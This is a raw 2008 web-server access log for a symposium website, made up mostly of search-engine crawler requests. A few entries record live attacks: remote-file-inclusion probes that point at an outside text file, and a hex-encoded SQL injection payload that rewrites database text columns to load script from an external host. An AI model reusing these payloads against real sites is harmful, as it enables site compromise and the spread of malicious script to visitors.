38.99.13.124 - - [29/Sep/2008:13:40:53 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.18.220 - - [29/Sep/2008:17:21:54 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.220 - - [29/Sep/2008:17:21:54 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.88 - - [29/Sep/2008:19:55:51 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.88 - - [29/Sep/2008:19:55:51 -0400] "GET /Program.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
65.55.209.31 - - [30/Sep/2008:02:34:26 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.209.31 - - [30/Sep/2008:02:34:26 -0400] "GET / HTTP/1.1" 200 326 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
74.6.8.92 - - [30/Sep/2008:03:40:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.92 - - [30/Sep/2008:03:40:17 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.160.179.25 - - [30/Sep/2008:04:52:43 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [30/Sep/2008:04:52:44 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
74.6.8.92 - - [30/Sep/2008:09:03:47 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.92 - - [30/Sep/2008:09:03:47 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.92 - - [30/Sep/2008:09:03:47 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
85.17.92.36 - - [30/Sep/2008:11:52:54 -0400] "GET / HTTP/1.1" 200 326 "http://www.newstin.com/add-source.a?webmasterpage" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
202.179.180.45 - - [30/Sep/2008:15:00:19 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [30/Sep/2008:15:00:23 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
208.115.111.242 - - [30/Sep/2008:15:01:07 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.geil-symposium.com
208.80.194.34 - - [30/Sep/2008:16:15:30 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; DigExt; (R1 1.5))" 0 www.geil-symposium.com
208.115.111.242 - - [30/Sep/2008:17:34:46 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" 0 www.geil-symposium.com
67.195.37.105 - - [30/Sep/2008:23:06:09 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [30/Sep/2008:23:06:19 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.108 - - [01/Oct/2008:00:30:49 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.108 - - [01/Oct/2008:00:30:49 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [01/Oct/2008:01:10:34 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [01/Oct/2008:01:10:58 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [01/Oct/2008:01:30:03 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [01/Oct/2008:01:33:25 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [01/Oct/2008:01:33:25 -0400] "GET /logs HTTP/1.1" 301 343 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [01/Oct/2008:01:33:25 -0400] "GET /logs/ HTTP/1.1" 200 385 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [01/Oct/2008:03:48:30 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
85.17.92.36 - - [01/Oct/2008:04:07:59 -0400] "GET / HTTP/1.1" 200 326 "http://www.kralher.cz?comment" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
85.17.92.36 - - [01/Oct/2008:04:07:59 -0400] "GET / HTTP/1.1" 200 326 "http://www.kralher.cz?comment" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
67.195.37.105 - - [01/Oct/2008:07:16:31 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [01/Oct/2008:07:16:40 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
85.17.92.36 - - [01/Oct/2008:08:12:27 -0400] "GET / HTTP/1.1" 200 326 "http://www.omget.com/?admin=suspendsite" "Mozilla/5.0 (Windows; U; Windows NT 5.1; us-en; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
66.249.65.200 - - [01/Oct/2008:08:33:58 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
202.108.7.214 - - [01/Oct/2008:10:27:18 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [01/Oct/2008:10:27:23 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
38.99.13.124 - - [01/Oct/2008:23:20:44 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.29 - - [01/Oct/2008:23:38:17 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Sgrunt|V109|598|S-1262292290|dial; E-nrgyPlus; dial; snprtz|S05272901980598Xe\\xad|isdn; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
85.73.157.151 - - [02/Oct/2008:01:28:26 -0400] "GET /logs/access.log HTTP/1.1" 200 132262 "-" "ffkwe5wddislupeqxhjmi mssbyql5" 13 www.geil-symposium.com
74.6.22.179 - - [02/Oct/2008:01:34:05 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.179 - - [02/Oct/2008:01:34:05 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
38.99.13.124 - - [02/Oct/2008:05:10:15 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.154 - - [02/Oct/2008:10:16:46 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.154 - - [02/Oct/2008:10:16:46 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
85.73.157.151 - - [02/Oct/2008:11:59:30 -0400] "GET /logs/access.log HTTP/1.1" 200 133356 "-" "ttprcrjasgoActjuftorkrjApoqqfpipwjwjfp" 19 www.geil-symposium.com
202.179.180.45 - - [02/Oct/2008:17:48:06 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [02/Oct/2008:17:48:13 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
74.6.18.230 - - [02/Oct/2008:22:52:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [02/Oct/2008:22:52:17 -0400] "GET /logs/access.log HTTP/1.0" 200 134082 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
84.74.48.20 - - [02/Oct/2008:23:31:24 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
84.74.48.20 - - [02/Oct/2008:23:31:47 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
84.74.48.20 - - [02/Oct/2008:23:31:47 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
84.74.48.20 - - [02/Oct/2008:23:31:48 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" 0 www.geil-symposium.com
79.129.150.237 - - [02/Oct/2008:23:59:24 -0400] "GET /logs/access.log HTTP/1.1" 200 134906 "-" "mgdsgjrlgvsderviguqlgsiloeeokesopgwedc" 16 www.geil-symposium.com
74.6.8.125 - - [03/Oct/2008:00:14:36 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.125 - - [03/Oct/2008:00:14:36 -0400] "GET /logs/access.log HTTP/1.0" 200 135260 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:02:50:29 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.30 - - [03/Oct/2008:02:50:29 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
66.249.65.200 - - [03/Oct/2008:03:14:10 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [03/Oct/2008:03:14:10 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:04:19:29 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [03/Oct/2008:04:19:29 -0400] "GET /Venue.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.22.155 - - [03/Oct/2008:06:40:04 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.155 - - [03/Oct/2008:06:40:05 -0400] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.155 - - [03/Oct/2008:06:40:05 -0400] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
38.99.13.124 - - [03/Oct/2008:06:42:00 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.35 - - [03/Oct/2008:07:00:31 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; ZangoToolbar 4.8.3; InfoPath.2)" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:22 -0400] "GET //?hl=http://veruci.com/images/v6-id.txt??? HTTP/1.1" 200 326 "-" "libwww-perl/5.811" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:22 -0400] "GET /logs/access.log//?hl=http://veruci.com/images/v6-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:22 -0400] "GET /logs//?hl=http://veruci.com/images/v6-id.txt??? HTTP/1.1" 200 390 "-" "libwww-perl/5.811" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:27 -0400] "GET /logs/access.log//?hlhttp://veruci.com/images/v6-id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.811" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:27 -0400] "GET /logs//?hlhttp://veruci.com/images/v6-id.txt??? HTTP/1.1" 200 390 "-" "libwww-perl/5.811" 0 www.geil-symposium.com
70.85.192.194 - - [03/Oct/2008:08:04:27 -0400] "GET //?hlhttp://veruci.com/images/v6-id.txt??? HTTP/1.1" 200 326 "-" "libwww-perl/5.811" 0 www.geil-symposium.com
74.6.8.125 - - [03/Oct/2008:09:45:44 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.125 - - [03/Oct/2008:09:45:44 -0400] "GET /publications.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
76.4.53.163 - - [03/Oct/2008:10:37:56 -0400] "GET /logs/access.log HTTP/1.1" 200 138936 "-" "gpmn utjd 5y evd 5nkDbu5gojgov5qhi" 24 www.geil-symposium.com
67.195.37.105 - - [03/Oct/2008:11:29:15 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [03/Oct/2008:11:29:16 -0400] "GET /logs/access.log HTTP/1.0" 200 139286 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.34.204.26 - - [03/Oct/2008:11:35:42 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [03/Oct/2008:11:35:42 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [03/Oct/2008:11:35:42 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:12:23:05 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [03/Oct/2008:12:23:05 -0400] "GET /accommodations.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:14:27:50 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:14:27:50 -0400] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
80.169.64.62 - - [03/Oct/2008:15:16:41 -0400] "GET /logs/access.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 140930 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322)" 80 www.geil-symposium.com
80.169.64.62 - - [03/Oct/2008:15:16:42 -0400] "GET /logs/access.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 140930 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1; .NET CLR 1.1.4322)" 81 www.geil-symposium.com
66.249.71.116 - - [03/Oct/2008:17:30:33 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.115 - - [03/Oct/2008:17:30:33 -0400] "GET /logs/error.log HTTP/1.1" 200 94446 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.117 - - [03/Oct/2008:17:49:39 -0400] "GET /logs/access.log HTTP/1.1" 200 144331 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.71.116 - - [03/Oct/2008:19:18:34 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
67.195.37.105 - - [03/Oct/2008:20:52:18 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [03/Oct/2008:20:52:19 -0400] "GET /logs/access.log HTTP/1.0" 200 144861 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
67.195.37.105 - - [03/Oct/2008:21:43:25 -0400] "GET /logs/error.log HTTP/1.0" 200 94934 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [03/Oct/2008:21:58:30 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [03/Oct/2008:21:58:30 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
67.195.37.105 - - [04/Oct/2008:01:30:56 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
67.195.37.105 - - [04/Oct/2008:01:30:57 -0400] "GET /logs/error.log HTTP/1.0" 200 95658 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 1 www.geil-symposium.com
131.107.0.111 - - [04/Oct/2008:01:59:13 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
65.55.230.186 - - [04/Oct/2008:02:08:56 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
65.55.230.186 - - [04/Oct/2008:02:08:56 -0400] "GET / HTTP/1.1" 200 326 "-" "msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)" 0 www.geil-symposium.com
219.140.64.136 - - [04/Oct/2008:02:16:42 -0400] "GET / HTTP/1.0" 200 314 "-" "lwp-trivial/1.40" 0 www.geil-symposium.com
88.65.249.190 - - [04/Oct/2008:03:00:12 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?hl=de&rls=com.microsoft%3Ade%3AIE-SearchBox&rlz=1I7SKPB&q=index+of+geil&lr=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
88.65.249.190 - - [04/Oct/2008:03:00:12 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
208.111.154.16 - - [04/Oct/2008:07:46:43 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [04/Oct/2008:07:46:43 -0400] "GET /transportation.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
202.160.179.25 - - [04/Oct/2008:09:58:22 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 1 www.geil-symposium.com
202.160.178.101 - - [04/Oct/2008:09:58:23 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
38.99.13.124 - - [04/Oct/2008:12:00:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.93 - - [04/Oct/2008:12:26:27 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.93 - - [04/Oct/2008:12:26:27 -0400] "GET /logs/error.log HTTP/1.0" 200 97339 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.33 - - [04/Oct/2008:18:25:36 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; .NET CLR 1.1.4322; Alexa Toolbar; IEMB3; Windows-Media-Player/10.00.00.3990; IEMB3; yplus 5.1.02b)" 0 www.geil-symposium.com
216.252.99.10 - - [04/Oct/2008:23:27:43 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 0 www.geil-symposium.com
